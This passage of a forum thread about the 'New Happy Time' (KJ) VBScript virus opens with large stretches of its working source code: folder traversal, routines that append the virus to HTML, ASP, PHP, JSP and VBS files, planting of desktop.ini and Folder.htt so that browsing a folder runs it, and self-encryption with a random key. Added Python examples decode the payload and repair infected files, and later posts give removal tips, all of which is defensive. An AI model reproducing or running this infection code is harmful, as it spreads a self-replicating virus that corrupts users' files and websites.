        Set DicSub = CreateObject("Scripting.Dictionary")
        Set Folders = ThisFolder.SubFolders
        FolderCount = 0
        For Each TempFolder in Folders
            FolderCount = FolderCount + 1
            DicSub.add FolderCount, TempFolder.Name
        Next
        If DicSub.Count = 0 Then
            LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
            SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
            CurrentString = KJChangeSub(CurrentString,LastIndexChar)
            SubE = 1
        Else
            If SubE = 0 Then
                CurrentString = CurrentString & DicSub.Item(1) & "\"
                Exit Do
            Else
                j = 0
                For j = 1 To FolderCount
                    If LCase(SubString) = LCase(DicSub.Item(j)) Then
                        If j < FolderCount Then
                            CurrentString = CurrentString & DicSub.Item(j+1) & "\"
                            Exit Do
                        End If
                    End If
                Next
                LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
                SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
                CurrentString = KJChangeSub(CurrentString,LastIndexChar)
            End If
        End If
    Loop
    KJOboSub = CurrentString
End Function

#18


' ------------------------------------------------------------------------------
Function KJPropagate()
    On Error Resume Next
    RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
    DiskDegree = WsShell.RegRead(RegPathValue)
    If DiskDegree = "" Then
        DiskDegree = FinalyDisk & ":\"
    End If
    For i=1 to 5
        DiskDegree = KJOboSub(DiskDegree)
        KJummageFolder(DiskDegree)
    Next
    WsShell.RegWrite RegPathValue,DiskDegree
End Function


' ------------------------------------------------------------------------------
Function KJummageFolder(PathName)
    On Error Resume Next
    Set FolderName = FSO.GetFolder(PathName)
    Set ThisFiles = FolderName.Files
    HttExists = 0

    ' Infect every eligible file in this folder (.Htm, .html, .asp, .php, .jsp, .vbs)
    For Each ThisFile In ThisFiles
        FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
        If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
            Call KJAppendTo(ThisFile.Path,"html")
        ElseIf FileExt = "VBS" Then
            Call KJAppendTo(ThisFile.Path,"vbs")
        ElseIf FileExt = "HTT" Then
            HttExists = 1
        End If
    Next
    If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then
        HttExists = 1
    End If

    ' If this folder has no .htt file, copy the prepared infected files into it
    ' The aim is to make the virus run whenever the user browses the folder
    If HttExists = 0 Then
        FSO.CopyFile WinPath & "system32\desktop.ini",PathName
        FSO.CopyFile WinPath & "web\Folder.htt",PathName
    End If
End Function


' ------------------------------------------------------------------------------
Function KJSetDim()
    On Error Resume Next

    ' Determine what kind of file the virus body is being executed in
    Err.Clear
    TestIt = WScript.ScriptFullname
    If Err Then
        InWhere = "html"
    Else
        InWhere = "vbs"
    End If

    If InWhere = "vbs" Then
        Set FSO = CreateObject("Scripting.FileSystemObject")
        Set WsShell = CreateObject("WScript.Shell")
    Else
        Set AppleObject = document.applets("KJ_guest")
        AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
        AppleObject.createInstance()
        Set WsShell = AppleObject.GetObject()
        AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
        AppleObject.createInstance()
        Set FSO = AppleObject.GetObject()
    End If
    Set DiskObject = FSO.Drives
    For Each DiskTemp In DiskObject
        If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
            Exit For
        End If
        FinalyDisk = DiskTemp.DriveLetter
    Next

    ' Generate a random encryption key
    Dim OtherArr(3)
    Randomize
    For i=0 To 3
        OtherArr(i) = Int((9 * Rnd))
    Next

    ' Encrypt the virus body with the random key
    ' The encrypted virus body is stored in TempString
    TempString = ""
    For i=1 To Len(ThisText)
        TempNum = Asc(Mid(ThisText,i,1))
        If TempNum = 13 Then
            TempNum = 28
        ElseIf TempNum = 10 Then
            TempNum = 29
        End If
        TempChar = Chr(TempNum - OtherArr(i Mod 4))
        If TempChar = Chr(34) Then
            TempChar = Chr(18)
        End If
        TempString = TempString & TempChar
    Next

    ' Build the data needed for each kind of infection
    ' UnLockStr holds the decryption routine
    UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
    ThisText = "ExeString = """ & TempString & """"
    HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
    VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"

    ' Get the path of the Windows directory
    WinPath = FSO.GetSpecialFolder(0) & "\"

    ' Copy the original C:\Windows\Web\Folder.htt to C:\Windows\Web\kjwall.gif
    If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
        FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
    End If

    ' Copy the original C:\Windows\System32\desktop.ini to C:\Windows\System32\kjwall.gif
    If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
        FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif"
    End If
End Function
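
The substitution layer that KJSetDim builds, and that the Execute(...) stub quoted earlier in the thread undoes, can be reversed statically for identification without ever running the script. This is an added example, not code from the thread; the function names are assumptions, and the sample blob is constructed from a harmless two-line string encoded with the key 4, 4, 1, 6 shown in that stub.

```python
import re

# Added example: static triage of a file that carries the KJ decoder stub.
BLOB_RE = re.compile(r'ExeString\s*=\s*"([^"]*)"')   # the blob never holds a raw quote
KEY_RE = re.compile(r'KeyArr\((\d)\)\s*=\s*(\d)')    # key digits come from Int(9 * Rnd)


def extract(text):
    """Return (blob, key) read from the stub, or None if the stub is absent."""
    blob = BLOB_RE.search(text)
    keys = {int(i): int(v) for i, v in KEY_RE.findall(text)}
    if blob is None or sorted(keys) != [0, 1, 2, 3]:
        return None
    return blob.group(1), [keys[i] for i in range(4)]


def decode(blob, key):
    """Mirror of the stub's loop: 1-based index, 18 -> quote, 28/29 -> CR/LF."""
    out = []
    for i, ch in enumerate(blob, start=1):
        n = ord(ch)
        if n == 18:          # the encoder swapped Chr(34) out to keep the literal closed
            n = 34
        n += key[i % 4]
        out.append("\r" if n == 28 else "\n" if n == 29 else chr(n))
    return "".join(out)


def triage(text):
    """Decode the embedded body and report whether it carries the KJ_start() marker."""
    found = extract(text)
    if found is None:
        return None
    blob, key = found
    body = decode(blob, key)
    return {"key": key, "body": body, "kj_marker": "KJ_start()" in body}


# Constructed sample: the blob is the harmless text  r=KJ_start() CRLF MsgBox "ok"
# encoded by hand with key 4,4,1,6; it is not taken from a real infected file.
SAMPLE = (
    '<script language=vbscript>\r\n'
    'ExeString = "n<EF[rn]ns\x12%\x18\x1cGocAit\x1c!ig\x1e"\r\n'
    'Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 4"&vbCrLf&'
    '"KeyArr(1) = 4"&vbCrLf&"KeyArr(2) = 1"&vbCrLf&"KeyArr(3) = 6"&vbCrLf&'
    '"For i=1 To Len(ExeString)")\r\n'
    '</script>'
)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Feed it the file's raw bytes decoded as latin-1: the encoder emits control characters (a space becomes a byte between 24 and 32), and copies pasted through a web page usually lose them.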

#19


Go to Kingsoft's website. I downloaded a free dedicated removal tool for the "New Happy Time" virus there, and it solves the problem.

#20


I have run into this too, and I agree with zhuxiaohua982.
I did not restore the registry.

#21


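Kingsoft's dedicated tool can clean it up completely. From my own experience, it is better not to delete the files by hand; the more you delete, the more there are. As for editing the registry, my experience is that you should not shut down normally after making the changes; otherwise, if there is cross-infection, all your effort is wasted. In the past, to deal with some trojans, my approach was to reset the machine directly after making the changes (press the RESET button), which works somewhat better!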

#22


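I got infected once too, but it was fine once I deleted the files. If web pages are also infected, open them in Notepad and you will find an extra "html" section (the one with vbscript) after the "html"; delete that trailing "html" and it is fine. Not sure whether that is right? In the end everything was OK.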
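
The manual fix described in this post can be automated from the three append layouts documented in the KJAppendTo comments in post #16. This is an added example, not code from the thread; the function and constant names are assumptions, and the sample files are constructed with a placeholder in place of the virus body.

```python
# Added example: undo the three append layouts documented in KJAppendTo.
HOOK = '<BODY onload="vbscript:KJ_start()">'
TAILS = {
    # html/htm/asp/php/jsp: original, then CRLF <HTML> CRLF hook CRLF body
    "html": "\r\n<HTML>\r\n" + HOOK + "\r\n",
    # vbs: original, then CRLF and the body, whose last statement is KJ_start()
    "vbs": '\r\nExeString = "',
    # htt: hook CRLF original CRLF body; the body opens with the hidden-applet script
    "htt": '\r\n<script language=vbscript>\r\ndocument.write "<div style=',
}


def repair(text, kind):
    """Return (status, text); status is 'clean', 'repaired' or 'manual'."""
    if "KJ_start()" not in text:
        return "clean", text
    cut = text.rfind(TAILS[kind])
    if cut < 0:
        return "manual", text            # marker present but layout unknown
    head, tail = text[:cut], text[cut:]
    if kind == "vbs":
        ok = tail.rstrip().endswith("KJ_start()")
    else:
        ok = tail.rstrip().endswith("</HTML>") and 'ExeString = "' in tail
    if kind == "htt":
        ok = ok and head.startswith(HOOK + "\r\n")
        head = head[len(HOOK) + 2:]      # drop the hook line placed before the original
    if not ok or "KJ_start()" in head:
        return "manual", text            # never guess: leave the file for a human
    return "repaired", head


# Constructed stand-in for the appended body (placeholder payload, not real code).
BODY = (
    '<script language=vbscript>\r\n'
    'document.write "<div style=\'visibility: hidden\'></div>"\r\n'
    '</script>\r\n<script language=vbscript>\r\n'
    'ExeString = "PLACEHOLDER"\r\n</script>\r\n</BODY>\r\n</HTML>'
)
ORIG_HTML = "<html><body>report</body></html>"
ORIG_VBS = 'WScript.Echo "backup done"'
ORIG_HTT = "<html><body>folder template</body></html>"

INFECTED_HTML = ORIG_HTML + TAILS["html"] + BODY
INFECTED_VBS = ORIG_VBS + '\r\nExeString = "PLACEHOLDER"\r\nExecute(ThisText)\r\nKJ_start()'
INFECTED_HTT = HOOK + "\r\n" + ORIG_HTT + "\r\n" + BODY

if __name__ == "__main__":
    for sample, kind in ((INFECTED_HTML, "html"), (INFECTED_VBS, "vbs"), (INFECTED_HTT, "htt")):
        print(kind, repair(sample, kind))
```

A file that comes back as 'manual' contains the marker in a layout that does not match KJAppendTo, so it is returned unchanged for inspection.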

#23


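This virus is a VB script virus that infects and spreads mainly by copying and executing the virus program.
When the virus activates, it searches every directory and copies desktop.ini and folder.htt into it,
and it also searches the whole disk for *.html files and adds VB script code to them.
Removal: the upgraded version of Rising 2002 will do.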